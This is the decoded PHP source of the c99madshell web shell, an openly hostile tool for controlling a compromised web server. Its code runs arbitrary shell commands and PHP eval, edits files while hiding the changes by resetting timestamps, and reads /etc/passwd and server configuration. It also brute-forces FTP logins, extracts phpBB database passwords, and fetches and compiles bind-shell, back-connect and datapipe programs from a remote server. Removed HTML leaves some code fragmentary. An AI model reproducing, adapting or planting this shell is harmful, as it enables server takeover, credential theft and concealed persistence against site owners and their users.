/* Decoded by unphp.net */ if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} error_reporting(5); @ignore_user_abort(TRUE); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_OS,0,3)) == "win"; define("starttime",getmicrotime()); if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} $_REQUEST = array_merge($_COOKIE,$_POST); foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} $shver = "1.0 shadow edition"; if (empty($surl)) { $surl = $_SERVER['PHP_SELF']; } $surl = htmlspecialchars($surl); $timelimit = 0; $host_allow = array("*"); $login_txt = "Admin area"; $accessdeniedmess = "c99madshell v.".$shver.": access denied"; $gzipencode = TRUE; $c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; $filestealth = TRUE; $donated_html = "
"; if ($tbl_struct) { echo " | Fields: "; foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "> ".$name." ";} echo " |
Software: {$DISP_SERVER_SOFTWARE} uname -a: " . wordwrap(php_uname(),90," "; if (!$win) {echo wordwrap(myshellexec("id"),90," Safe-mode: {$hsafemode} "; $d = str_replace("\",DIRECTORY_SEPARATOR,$d); if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} $d = str_replace("\",DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $d = str_replace("\","\",$d); $dispd = htmlspecialchars($d); $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); $i = 0; foreach($pd as $b) { $t = ""; $j = 0; foreach ($e as $r) { $t.= $r.DIRECTORY_SEPARATOR; if ($j == $i) {break;} $j++; } echo "".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; $i++; } echo " "; if (is_writable($d)) { $wd = TRUE; $wdt = "[ ok ]"; echo "".view_perms(fileperms($d)).""; } else { $wd = FALSE; $wdt = "[ Read-Only ]"; echo "".view_perms_color($d).""; } if (is_callable("disk_free_space")) { $free = disk_free_space($d); $total = disk_total_space($d); if ($free === FALSE) {$free = 0;} if ($total === FALSE) {$total = 0;} if ($free < 0) {$free = 0;} if ($total < 0) {$total = 0;} $used = $total-$free; $free_percent = round(100/($total/$free),2); echo " |
".$donated_html." |
"; if ($act == "") {$act = $dspact = "ls";} if ($act == "sql") { echo(""); if (isset($_POST['sql_login'])) {$sql_login=htmlspecialchars($_POST['sql_login']);} if (isset($_POST['sql_passwd'])) {$sql_passwd=htmlspecialchars($_POST['sql_passwd']);} if (isset($_POST['sql_server'])) {$sql_server=htmlspecialchars($_POST['sql_server']);} if (isset($_POST['sql_port'])) {$sql_port=htmlspecialchars($_POST['sql_port']);} if (isset($_POST['sql_db'])) {$sql_db=htmlspecialchars($_POST['sql_db']);} if (isset($_POST['sql_act'])) {$sql_act=htmlspecialchars($_POST['sql_act']);} if (isset($_POST['sql_tbl'])) {$sql_tbl=htmlspecialchars($_POST['sql_tbl']);} if (isset($_POST['sql_tbl_act'])) {$sql_tbl_act=htmlspecialchars($_POST['sql_tbl_act']);} if (isset($_POST['thistbl'])) {$thistbl=htmlspecialchars($_POST['thistbl']);} if (isset($_POST['sql_order'])) {$sql_order=htmlspecialchars($_POST['sql_order']);} if (isset($_POST['sql_tbl_ls'])) {$sql_tbl_ls=htmlspecialchars($_POST['sql_tbl_ls']);} if (isset($_POST['sql_tbl_le'])) {$sql_tbl_le=htmlspecialchars($_POST['sql_tbl_le']);} if (isset($_POST['sql_query'])) {$sql_query=htmlspecialchars($_POST['sql_query']);} if (isset($_POST['sql_tbl_insert_q'])) {$sql_tbl_insert_q=urldecode(htmlspecialchars($_POST['sql_tbl_insert_q']));} if (isset($_POST['sql_tbl_insert_functs'])) {$sql_tbl_insert_functs=htmlspecialchars($_POST['sql_tbl_insert_functs']);} if (isset($_POST['sql_tbl_insert_radio'])) {$sql_tbl_insert_radio=htmlspecialchars($_POST['sql_tbl_insert_radio']);} echo"
"; } $act = $dspact = "ls"; } if ($act == "ftpquickbrute") { echo "Ftp Quick brute: "; if (!win) {echo "This functions not work in Windows! ";} else { function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) { if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} else {$TRUE = TRUE;} if ($TRUE) { $sock = @ftp_connect($host,$port,$timeout); if (@ftp_login($sock,$login,$pass)) { echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\". "; ob_flush(); return TRUE; } } } if (!empty($submit)) { if (isset($_POST['fqb_lenght'])) $fqb_lenght = $_POST['fqb_lenght']; if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} $fp = fopen("/etc/passwd","r"); if (!$fp) {echo "Can't get /etc/passwd for password-list.";} else { if (isset($_POST['fqb_logging'])) $fqb_logging = $_POST['fqb_logging']; if ($fqb_logging) { if (isset($_POST['fqb_logfile'])) $fqb_logging = $_POST['fqb_logfile']; if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} else {$fqb_logfp = FALSE;} $fqb_log = "FTP Quick Brute (called c99madshell v. ".$shver.") started at ".date("d.m.Y H:i:s")." "; if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} } ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while(!feof($fp)) { $str = explode(":",fgets($fp,2048)); if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\" "; $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")." "; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} $success++; ob_flush(); } if ($i > $fqb_lenght) {break;} $i++; } if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections! ";} $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); echo " Done! Total time (secs.): ".$ftpquick_t." Total connections: ".$i." Success.: ".$success." Unsuccess.:".($i-$success)." Connects per second: ".round($i/$ftpquick_t,2)." "; $fqb_log .= " ------------------------------------------ Done! Total time (secs.): ".$ftpquick_t." Total connections: ".$i." Success.: ".$success." Unsuccess.:".($i-$success)." Connects per second: ".round($i/$ftpquick_t,2)." "; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} fclose($fqb_logfp); } } else { $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); echo ""; } } } if ($act == "d") { if (!is_dir($d)) {echo "
"; } } if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} if ($act == "security") { echo " "; if (!$win) { if ($nixpasswd) { if ($nixpasswd == 1) {$nixpasswd = 0;} echo "*nix /etc/passwd: "; if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} echo " "; $i = $nixpwd_s; while ($i < $nixpwd_e) { $uid = posix_getpwuid($i); if ($uid) { $uid["dir"] = "".$uid["dir"].""; echo join(":",$uid)." "; } $i++; } } else {echo " Get /etc/passwd ";} } else { $v = $_SERVER["WINDIR"]." epair\sam"; if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.") ";} else {echo "You can crack winnt passwords. Download, and use lcp.crack+ c. ";} } if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs ";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs ";} if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf) ";} if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf) ";} if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf) ";} if (file_get_contents("/etc/motd")) {echo "Message Of The Day ";} if (file_get_contents("/etc/hosts")) {echo "Hosts ";} function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)." ";}} displaysecinfo("OS Version?",myshellexec("cat /proc/version")); displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); displaysecinfo("RAM",myshellexec("free -m")); displaysecinfo("HDD space",myshellexec("df -h")); displaysecinfo("List of Attributes",myshellexec("lsattr -a")); displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); displaysecinfo("Is cURL installed?",myshellexec("which curl")); displaysecinfo("Is lynx installed?",myshellexec("which lynx")); displaysecinfo("Is links installed?",myshellexec("which links")); displaysecinfo("Is fetch installed?",myshellexec("which fetch")); displaysecinfo("Is GET installed?",myshellexec("which GET")); displaysecinfo("Is perl installed?",myshellexec("which perl")); displaysecinfo("Where is apache",myshellexec("whereis apache")); displaysecinfo("Where is perl?",myshellexec("whereis perl")); displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); displaysecinfo("locate my.conf",myshellexec("locate my.conf")); displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); } if ($act == "mkfile") { if ($mkfile != $d) { if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} } else {$act = $dspact = "ls";} } if ($act == "fsbuff") { $arr_copy = $sess_data["copy"]; $arr_cut = $sess_data["cut"]; $arr = array_merge($arr_copy,$arr_cut); if (count($arr) == 0) {echo " "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} } if ($act == "selfremove") { if (($submit == $rndcode) and ($submit != "")) { if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99madshell v.".$shver."!"; c99shexit(); } else {echo " "; if (empty($search_in)) {$search_in = $d;} if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} if (empty($search_text_wwo)) {$search_text_regexp = 0;} if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $search_i_f = 0; $search_i_d = 0; $a = array ( "name"=>$search_name, "name_regexp"=>$search_name_regexp, "text"=>$search_text, "text_regexp"=>$search_text_regxp, "text_wwo"=>$search_text_wwo, "text_cs"=>$search_text_cs, "text_not"=>$search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(";",$search_in)); foreach($in as $v) {c99fsearch($v);} $searchtime = round(getmicrotime()-$searchtime,4); if (count($found) == 0) {echo "No files found!";} else { $ls_arr = $found; $disp_fullpath = TRUE; $act = "ls"; } } echo ""; if ($act == "ls") {$dspact = $act; echo " Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second). ";} } if ($act == "chmod") { $mode = fileperms($d.$f); if (!$mode) {echo "Change file-mode with error: can't get current value.";} else { $form = TRUE; if ($chmod_submit) { $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} else {$err = "Can't chmod to ".$octet.".";} } if ($form) { $perms = parse_perms($mode); echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).") ".($err?"Error: ".$err:"").""; } } } if ($act == "upload") { $uploadmess = ""; $uploadpath = str_replace("\",DIRECTORY_SEPARATOR,$uploadpath); if (empty($uploadpath)) {$uploadpath = $d;} elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} if (!empty($submit)) { global $HTTP_POST_FILES; $uploadfile = $HTTP_POST_FILES["uploadfile"]; if (!empty($uploadfile["tmp_name"])) { if (empty($uploadfilename)) {$destin = $uploadfile["name"];} else {$destin = $userfilename;} if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"! ";} } elseif (!empty($uploadurl)) { if (!empty($uploadfilename)) {$destin = $uploadfilename;} else { $destin = explode("/",$destin); $destin = $destin[count($destin)-1]; if (empty($destin)) { $i = 0; $b = ""; while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} } if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url! ";} else { $st = getmicrotime(); $content = @file_get_contents($uploadurl); $dt = round(getmicrotime()-$st,4); if (!$content) {$uploadmess .= "Can't download file! ";} else { if ($filestealth) {$stat = stat($uploadpath.$destin);} $fp = fopen($uploadpath.$destin,"w"); if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."! ";} else { fwrite($fp,$content,strlen($content)); fclose($fp); if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} } } } } } if ($miniform) { echo "".$uploadmess.""; $act = "ls"; } else { echo "File upload: ".$uploadmess.""; } } if ($act == "delete") { $delerr = ""; foreach ($actbox as $v) { $result = FALSE; $result = fs_rmobj($v); if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)." ";} } if (!empty($delerr)) {echo "Deleting with errors: ".$delerr;} $act = "ls"; } if (!$usefsbuff) { if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo " ";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."! ";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors: ".$psterr;} $act = "ls"; } elseif ($actarcbuff) { $arcerr = ""; if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} else {$ext = ".tar.gz";} if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} $cmdline .= " ".$actarcbuff_path; $objects = array_merge($sess_data["copy"],$sess_data["cut"]); foreach($objects as $v) { $v = str_replace("\",DIRECTORY_SEPARATOR,$v); if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} if (is_dir($v)) { if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} $v .= "*"; } $cmdline .= " ".$v; } $tmp = realpath("."); chdir($d); $ret = myshellexec($cmdline); chdir($tmp); if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")! ";} $ret = str_replace(" "," ",$ret); $ret = explode(" ",$ret); if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} foreach($sess_data["cut"] as $k=>$v) { if (in_array($v,$ret)) {fs_rmobj($v);} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($arcerr)) {echo "Archivation errors: ".$arcerr;} $act = "ls"; } elseif ($actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."! ";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."! ";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors: ".$psterr;} $act = "ls"; } } if ($act == "cmd") { if (trim($cmd) == "ps -aux") {$act = "processes";} elseif (trim($cmd) == "tasklist") {$act = "processes";} else { @chdir($chdir); if (!empty($submit)) { echo "Result of execution this command: "; $olddir = realpath("."); @chdir($d); $ret = myshellexec($cmd); $ret = convert_cyr_string($ret,"d","w"); if ($cmd_txt) { $rows = count(explode(" ",$ret))+1; if ($rows < 10) {$rows = 10;} echo " "; } else {echo $ret." ";} @chdir($olddir); } else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} echo ""; } } if ($act == "ls") { if (count($ls_arr) > 0) {$list = $ls_arr;} else { $list = array(); if ($h = @opendir($d)) { while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} closedir($h); } else {} } if (count($list) == 0) {echo " "; if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) { echo " "; } echo " "; echo ""; } } if ($act == "tools") { $bndportsrcs = array( "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), "c99sh_bindport.c"=>array("Using C","%path %port %pass") ); $bcsrcs = array( "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), "c99sh_backconn.c"=>array("Using C","%path %host %port") ); $dpsrcs = array( "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") ); if (!is_array($bind)) {$bind = array();} if (!is_array($bc)) {$bc = array();} if (!is_array($datapipe)) {$datapipe = array();} if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} if (!empty($bindsubmit)) { echo "Result of binding port:"; $v = $bndportsrcs[$bind["src"]]; if (empty($v)) {echo "Unknown file! ";} elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other! ";} else { $w = explode(".",$bind["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"! ";} elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%port",$bind["port"],$v[1]); $v[1] = str_replace("%pass",$bind["pass"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); sleep(5); $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"! "; } } if (!empty($bcsubmit)) { echo "Result of back connection: "; $v = $bcsrcs[$bc["src"]]; if (empty($v)) {echo "Unknown file! ";} else { $w = explode(".",$bc["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"! ";} elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%host",$bc["host"],$v[1]); $v[1] = str_replace("%port",$bc["port"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."... "; } } } if (!empty($dpsubmit)) { echo "Result of datapipe-running: "; $v = $dpsrcs[$datapipe["src"]]; if (empty($v)) {echo "Unknown file! ";} elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other! ";} else { $srcpath = $tmpdir.$datapipe["src"]; $w = explode(".",$datapipe["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"! ";} elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); sleep(5); $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"! "; } } echo"Binding port: Back connection: Click \"Connect\" only after open port for it. You should use NetCat©, run \"nc -l -n -v -p {$bc_port}\"! Datapipe: Note: sources will be downloaded from remote server."; } if ($act == "processes") { echo "Processes: "; if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} else {$handler = "tasklist";} $ret = myshellexec($handler); if (!$ret) {echo "Can't execute \"".$handler."\"!";} else { if (empty($processes_sort)) {$processes_sort = $sort_default;} $parsesort = parsesort($processes_sort); if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} $k = $parsesort[0]; if ($parsesort[1] != "a") {$y = "!";} else {$y = "!";} $ret = htmlspecialchars($ret); if (!$win) { if ($pid) { if (is_null($sig)) {$sig = 9;} echo "Sending signal ".$sig." to #".$pid."... "; if (posix_kill($pid,$sig)) {echo "OK.";} else {echo "ERROR.";} } while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} $stack = explode(" ",$ret); $head = explode(" ",$stack[0]); unset($stack[0]); for($i=0;$i
"; $tmp = ob_get_contents(); $olddir = realpath("."); @chdir($d); if ($tmp) { ob_clean(); eval($eval); $ret = ob_get_contents(); $ret = convert_cyr_string($ret,"d","w"); ob_clean(); echo $tmp; if ($eval_txt) { $rows = count(explode(" ",$ret))+1; if ($rows < 10) {$rows = 10;} echo " "; } else {echo $ret." ";} } else { if ($eval_txt) { echo " "; } else {echo $ret;} } @chdir($olddir); } else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} echo ""; } if ($act == "f") { if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") { if (file_exists($d.$f)) {echo " Create Select action/file-type: "; foreach($arr as $t) { if ($t[1] == $rft) {echo " ".$t[0]."";} elseif ($t[1] == $ft) {echo " ".$t[0]."";} else {echo " ".$t[0]."";} echo " |"; } echo " "; if ($ft == "info") { echo "Information:
"; $fi = fopen($d.$f,"rb"); if ($fi) { if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} $n = 0; $a0 = "00000000 "; $a1 = ""; $a2 = ""; for ($i=0; $i "; $a2 .= " "; } } echo "
"; } $encoded = ""; if ($base64 == 1) { echo "Base64 Encode "; $encoded = base64_encode(file_get_contents($d.$f)); } elseif($base64 == 2) { echo "Base64 Encode + Chunk "; $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); } elseif($base64 == 3) { echo "Base64 Encode + Chunk + Quotes "; $encoded = base64_encode(file_get_contents($d.$f)); $encoded = substr(preg_replace("!.{1,76}!","' '. ",$encoded),0,-2); } elseif($base64 == 4) { $text = file_get_contents($d.$f); $encoded = base64_decode($text); echo "Base64 Decode"; if (base64_encode($encoded) != $text) {echo " (failed)";} echo " "; } if (!empty($encoded)) { echo " "; } echo "HEXDUMP: Base64: "; } elseif ($ft == "html") { if ($white) {@ob_clean();} echo $r; if ($white) {c99shexit();} } elseif ($ft == "txt") {echo " ".htmlspecialchars($r)."";} elseif ($ft == "ini") {echo " "; var_dump(parse_ini_file($d.$f,TRUE)); echo "";} elseif ($ft == "phpsess") { echo " "; $v = explode("|",$r); echo $v[0].""; } elseif ($ft == "exe") { $ext = explode(".",$f); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach($exeftypes as $k=>$v) { if (in_array($ext,$v)) {$rft = $k; break;} } $cmd = str_replace("%f%",$f,$rft); echo "Execute file:"; } elseif ($ft == "sdb") {echo " "; var_dump(unserialize(base64_decode($r))); echo "";} elseif ($ft == "code") { if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) { $arr = explode(" ",$r); if (count($arr == 18)) { include($d.$f); echo "phpBB configuration is detected in this file! "; if ($dbms == "mysql4") {$dbms = "mysql";} if ($dbms == "mysql") {echo "Connect to DB ";} else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99madshell. Please, report us for fix.";} echo "Parameters for manual connect: "; $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."' ";} echo " "; } } echo " "; if (!empty($white)) {@ob_clean();} highlight_file($d.$f); if (!empty($white)) {c99shexit();} echo " "; } elseif ($ft == "download") { @ob_clean(); header("Content-type: application/octet-stream"); header("Content-length: ".filesize($d.$f)); header("Content-disposition: attachment; filename=\"".$f."\";"); echo $r; exit; } elseif ($ft == "notepad") { @ob_clean(); header("Content-type: text/plain"); header("Content-disposition: attachment; filename=\"".$f.".txt\";"); echo($r); exit; } elseif ($ft == "edit") { if (!empty($submit)) { if ($filestealth) {$stat = stat($d.$f);} $fp = fopen($d.$f,"w"); if (!$fp) {echo "Can't write to file!";} else { echo "Saved!"; fwrite($fp,$edit_text); fclose($fp); if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} $r = $edit_text; } } $rows = count(explode("
",$r)); if ($rows < 10) {$rows = 10;} if ($rows > 30) {$rows = 30;} echo ""; } elseif (!empty($ft)) {echo " |
:: Command execute :: | |
--[ SShell v. {$shver} | http://no.net | Generation time: ".round(getmicrotime()-starttime,4)." ]-- |